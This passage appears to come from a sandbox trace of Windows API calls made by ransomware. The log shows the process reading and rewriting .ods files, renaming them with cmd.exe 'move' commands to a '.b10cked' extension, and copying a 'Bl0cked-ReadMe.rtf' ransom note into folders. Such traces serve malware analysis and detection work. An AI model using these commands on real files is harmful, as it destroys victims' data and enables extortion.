(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x116d4 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.536] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x116d4 [0137.536] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.536] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.536] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8b69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8b69, lpOverlapped=0x0) returned 1 [0137.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.537] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8b69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8b69, lpOverlapped=0x0) returned 1 [0137.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=-35689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8b6b [0137.537] ReadFile (in: 
hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8b69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8b69, lpOverlapped=0x0) returned 1 [0137.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=-35689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8b6b [0137.537] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8b69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8b69, lpOverlapped=0x0) returned 1 [0137.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pWkwXr56WJA6 l5.ods", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pWkwXr56WJA6 l5.ods", cchWideChar=19, lpMultiByteStr=0x13286a4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pWkwXr56WJA6 l5.ods", lpUsedDefaultChar=0x0) returned 19 [0137.541] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x116d4 [0137.541] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.541] CloseHandle (hObject=0x114) returned 1 [0137.542] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS") returned 0x25 [0137.543] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0137.543] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xdb0, dwThreadId=0xd48)) returned 1 [0137.555] CloseHandle (hObject=0x110) returned 1 [0137.556] CloseHandle (hObject=0x114) returned 1 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.556] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 1 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.556] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, 
lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\9bqdi69.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.556] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19434561415) returned 1 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x16b0f [0137.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x16627 [0137.558] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16b0f [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16b0f [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.559] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb586, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb586, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.560] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb586, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb586, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointer (in: hFile=0x114, lDistanceToMove=-46470, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb589 [0137.560] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb586, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb586, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointer (in: hFile=0x114, lDistanceToMove=-46470, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb589 [0137.560] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb586, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb586, lpOverlapped=0x0) returned 1 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9bQDI69.ods", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9bQDI69.ods", cchWideChar=11, lpMultiByteStr=0x131322c, cbMultiByte=11, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9bQDI69.ods", lpUsedDefaultChar=0x0) returned 11 [0137.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16b0f [0137.565] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.565] CloseHandle (hObject=0x114) returned 1 [0137.566] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\9bQDI69.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods") returned 0x35 [0137.566] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0137.567] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"", 
lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd58, dwThreadId=0xd68)) returned 1 [0137.572] CloseHandle (hObject=0x110) returned 1 [0137.572] CloseHandle (hObject=0x114) returned 1 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.572] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.573] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.573] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.573] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0137.573] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.573] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.573] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd7c, dwThreadId=0xd70)) returned 1 [0137.603] CloseHandle (hObject=0x110) returned 1 [0137.603] CloseHandle (hObject=0x114) returned 1 [0137.603] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0137.603] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.603] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | 
out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.603] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\IJFqBHm_BK63v.ods" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\ijfqbhm_bk63v.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.604] SetFilePointer (in: hFile=0x114, 